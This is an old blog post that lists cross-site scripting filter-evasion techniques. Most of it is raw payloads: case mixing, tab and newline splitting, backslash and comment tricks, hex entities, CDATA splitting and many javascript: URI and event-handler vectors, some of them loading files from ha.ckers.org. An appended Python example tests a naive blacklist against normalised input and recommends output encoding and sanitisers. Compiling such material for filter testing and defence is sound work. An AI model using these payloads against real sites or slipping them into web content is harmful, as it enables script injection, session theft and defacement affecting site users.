Introduction to Cross-Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28
1. Change the letter case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use another extension in place of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {

               background-image: url('javascript:alert("XSS");')

          }

5. Insert other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade (the gaps inside "javascript" below stand for a tab or a newline character, shown here as spaces)

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event-handler attributes)

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an swf file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart, then reassemble it.

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">

    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href and url()

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

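As an added, defender-side example that is not part of the original post, the Python below runs a literal blacklist over one constructed sample per evasion category from sections 1, 6, 7, 8 and 11, first on the raw input and then after normalisation (entity and CSS hex decoding, stripping CDATA boundaries, comments, backslashes, tabs and newlines, then case-folding). The sample strings, the `normalize` routine and the blacklist pattern are this example's own constructions, not code from the post.

```python
import html
import re

# Constructed samples, one per evasion category from the list above (not real traffic).
SAMPLES = {
    "case":      "<sCript>alert('d')</scRipT>",                                  # section 1
    "tab":       "<img src=\"jav\tascr\tipt:alert('XSS3')\">",                    # section 6
    "newline":   "<img src=\"jav\nascript:alert('XSS')\">",                       # section 6
    "backslash": "<DIV STYLE=\"width: expre\\ssi\\on(alert('XSS31'));\">",        # section 7
    "comment":   "<IMG STYLE=\"xss:expr/*anyword*/ession(alert('sss'))\">",      # section 7
    "entity":    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=&#x6A&#x61vascript:alert('abc');\">",  # section 8, ';' dropped
    "cdata":     "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]></C></X></xml>",  # section 11
    "clean":     "<p>Read our <a href=\"https://example.com/js\">JavaScript guide</a></p>",
}

# The literal, case-sensitive blacklist that the evasions above are written against.
DANGEROUS = re.compile(r"<script|javascript:|expression\(")

def naive_filter(s):
    """True if the raw input matches the blacklist."""
    return bool(DANGEROUS.search(s))

def _css_hex(m):
    # CSS escape \HHHHHH -> the character it encodes (section 8); drop out-of-range values
    cp = int(m.group(1), 16)
    return chr(cp) if cp <= 0x10FFFF else ""

def normalize(s):
    """Undo the transformations used in sections 1, 6, 7, 8 and 11 before matching."""
    s = html.unescape(s)                                         # &#x6A; -> j, with or without ';'
    s = re.sub(r"\\([0-9a-fA-F]{1,6})[ \t\n]?", _css_hex, s)     # CSS hex escapes
    s = re.sub(r"<!\[CDATA\[|\]\]>", "", s)                      # CDATA boundaries used to split a token
    s = re.sub(r"<!--.*?-->|/\*.*?\*/", "", s, flags=re.S)       # HTML and CSS comments used as splitters
    s = s.replace("\\", "")                                      # remaining backslashes (expre\ssion)
    s = re.sub(r"[\t\n\r\x00]", "", s)                           # tab/newline/NUL inside javascript:
    return s.lower()                                             # case variations

def normalized_filter(s):
    """Same blacklist, applied after normalisation."""
    return naive_filter(normalize(s))

def missed_by_naive():
    """Sample names the naive filter lets through but the normalised filter blocks."""
    return sorted(k for k, v in SAMPLES.items()
                  if not naive_filter(v) and normalized_filter(v))

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:9s} naive={naive_filter(payload)} normalized={normalized_filter(payload)}")
```

Several of the listed tricks (CSS expression(), javascript: in IMG SRC, DYNSRC/LOWSRC, DATASRC binding, HTML+TIME) only ever worked in old Internet Explorer, but the normalise-before-matching lesson applies to any filter. A blacklist like this is a last line of defence only; context-aware output encoding and an allow-list HTML sanitiser are the primary controls.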